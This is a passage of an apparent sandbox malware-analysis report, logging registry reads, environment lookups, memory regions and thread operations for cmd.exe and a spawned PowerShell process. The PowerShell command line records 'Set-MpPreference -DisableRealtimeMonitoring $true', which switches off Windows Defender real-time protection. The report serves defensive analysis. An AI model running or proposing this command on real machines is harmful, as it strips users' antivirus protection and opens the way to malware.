Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Windows\system32, type = file_attributes True 1
Fn
File Get Info filename = C:\Windows\System32, type = file_attributes True 1
Fn
Environment Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75fe3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x75fc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x75fda79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000001 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #18: powershell.exe
205 0
»
Information Value
ID #18
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:41, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:27
OS Process Information
»
Information Value
PID 0x914
Parent PID 0x648 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 3C4
0x 748
0x 9C0
0x 9DC
0x 9AC
0x 9C4
0x 4B4
0x 37C
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000a0000 0x000a0000 0x000a0fff Pagefile Backed Memory Readable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
pagefile_0x0000000000120000 0x00120000 0x00121fff Pagefile Backed Memory Readable, Writable True False False -
powershell.exe.mui 0x00130000 0x00132fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x00140fff Private Memory Readable, Writable True False False -
private_0x0000000000150000 0x00150000 0x00150fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000160000 0x00160000 0x00160fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000170000 0x00170000 0x00170fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
cversions.2.db 0x001f0000 0x001f3fff Memory Mapped File Readable True False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x00200000 0x0021efff Memory Mapped File Readable True False False -
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False -
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db 0x00230000 0x0025ffff Memory Mapped File Readable True False False -
cversions.2.db 0x00260000 0x00263fff Memory Mapped File Readable True False False -
pagefile_0x0000000000270000 0x00270000 0x00270fff Pagefile Backed Memory Readable True False False -
private_0x0000000000280000 0x00280000 0x0028ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002b0000 0x002b0000 0x002effff Private Memory Readable, Writable True False False -
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory - True False False -
private_0x0000000000300000 0x00300000 0x0030ffff Private Memory - True False False -
private_0x0000000000310000 0x00310000 0x0034ffff Private Memory Readable, Writable True False False -
private_0x0000000000350000 0x00350000 0x003cffff Private Memory Readable, Writable True False False -
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x003d0000 0x00435fff Memory Mapped File Readable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory - True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory - True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory - True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x004bffff Private Memory Readable, Writable, Executable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
l_intl.nls 0x004d0000 0x004d2fff Memory Mapped File Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004e0fff Private Memory Readable, Writable True False False -
sorttbls.nlp 0x004f0000 0x004f4fff Memory Mapped File Readable False False False -
private_0x0000000000500000 0x00500000 0x0053ffff Private Memory Readable, Writable True False False -
microsoft.wsman.runtime.dll 0x00540000 0x00547fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000550000 0x00550000 0x0064ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000650000 0x00650000 0x007d7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000007e0000 0x007e0000 0x00960fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000970000 0x00970000 0x01d6ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d70000 0x01d70000 0x01e4efff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e80000 0x01e80000 0x01ebffff Private Memory Readable, Writable True False False -
private_0x0000000001ed0000 0x01ed0000 0x01f0ffff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002070000 0x02070000 0x020affff Private Memory Readable, Writable True False False -
sortkey.nlp 0x020b0000 0x020f0fff Memory Mapped File Readable False False False -
private_0x0000000002110000 0x02110000 0x0214ffff Private Memory Readable, Writable True False False -
private_0x0000000002150000 0x02150000 0x0218ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02190000 0x0245efff Memory Mapped File Readable False False False -
pagefile_0x0000000002460000 0x02460000 0x02852fff Pagefile Backed Memory Readable True False False -
private_0x0000000002890000 0x02890000 0x028cffff Private Memory Readable, Writable True False False -
system.transactions.dll 0x028d0000 0x0290ffff Memory Mapped File Readable False False False -
private_0x0000000002910000 0x02910000 0x0294ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002950000 0x02950000 0x029effff Private Memory Readable, Writable True False False -
private_0x0000000002a70000 0x02a70000 0x02a7ffff Private Memory Readable, Writable True False False -
private_0x0000000002a80000 0x02a80000 0x04a7ffff Private Memory Readable, Writable True False False -
private_0x0000000004aa0000 0x04aa0000 0x04adffff Private Memory Readable, Writable True False False -
system.management.automation.dll 0x04ae0000 0x04dc1fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll.mui 0x04dd0000 0x04e8ffff Memory Mapped File Readable, Writable False False False -
powershell.exe 0x21d50000 0x21dc1fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
system.management.automation.ni.dll 0x71f20000 0x72799fff Memory Mapped File Readable, Writable, Executable True False False -
system.management.automation.dll 0x727a0000 0x72a81fff Memory Mapped File Readable, Writable, Executable False False False -
system.ni.dll 0x72a90000 0x7322bfff Memory Mapped File Readable, Writable, Executable True False False -
mscorlib.ni.dll 0x73230000 0x73d27fff Memory Mapped File Readable, Writable, Executable True False False -
mscorwks.dll 0x73d30000 0x742dafff Memory Mapped File Readable, Writable, Executable True False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
system.core.ni.dll 0x74400000 0x74634fff Memory Mapped File Readable, Writable, Executable True False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
system.transactions.ni.dll 0x74680000 0x7471bfff Memory Mapped File Readable, Writable, Executable True False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.commands.diagnostics.ni.dll 0x747a0000 0x747eafff Memory Mapped File Readable, Writable, Executable True False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.powershell.consolehost.ni.dll 0x749a0000 0x74a20fff Memory Mapped File Readable, Writable, Executable True False False -
msvcr80.dll 0x74a80000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
mscoreei.dll 0x74b20000 0x74b99fff Memory Mapped File Readable, Writable, Executable True False False -
ntshrui.dll 0x74ba0000 0x74c0ffff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.management.ni.dll 0x75020000 0x750a4fff Memory Mapped File Readable, Writable, Executable True False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
cscapi.dll 0x75340000 0x7534afff Memory Mapped File Readable, Writable, Executable False False False -
slc.dll 0x75360000 0x75369fff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x75370000 0x75388fff Memory Mapped File Readable, Writable, Executable False False False -
linkinfo.dll 0x75390000 0x75398fff Memory Mapped File Readable, Writable, Executable False False False -
apphelp.dll 0x753a0000 0x753ebfff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x75430000 0x7545dfff Memory Mapped File Readable, Writable, Executable False False False -
propsys.dll 0x75460000 0x75554fff Memory Mapped File Readable, Writable, Executable False False False -
mscoree.dll 0x75560000 0x755a9fff Memory Mapped File Readable, Writable, Executable True False False -
atl.dll 0x755b0000 0x755c3fff Memory Mapped File Readable, Writable, Executable False False False -
microsoft.wsman.runtime.dll 0x755e0000 0x755e7fff Memory Mapped File Readable, Writable, Executable False False False -
system.configuration.install.ni.dll 0x755f0000 0x75614fff Memory Mapped File Readable, Writable, Executable True False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x759b0000 0x759d6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
devobj.dll 0x75b30000 0x75b41fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
setupapi.dll 0x760c0000 0x7625cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x77650000 0x77654fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 50 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x3c4
80 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
User Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Module Get Filename process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
File Get Info filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 9
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
System Get Info type = Operating System True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Environment Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 1
Fn
File Get Info filename = C:\, type = file_attributes True 4
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Environment Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Environment Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
Environment Get Environment String name = MshEnableTrace False 7
Fn
Thread 0x9c4
1 0
»
Category Operation Information Success Count Logfile
Module Unmap process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe True 1
Fn
Thread 0x4b4
124 0
»
Category Operation Information Success Count Logfile
Environment Get Environment String name = MshEnableTrace False 19
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 2
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Write filename = CONOUT$, size = 79 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 79 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 62 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 17 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 57 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 79 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 25 True 1
Fn
Data
File Create filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 3
Fn
File Write filename = CONOUT$, size = 1 True 1
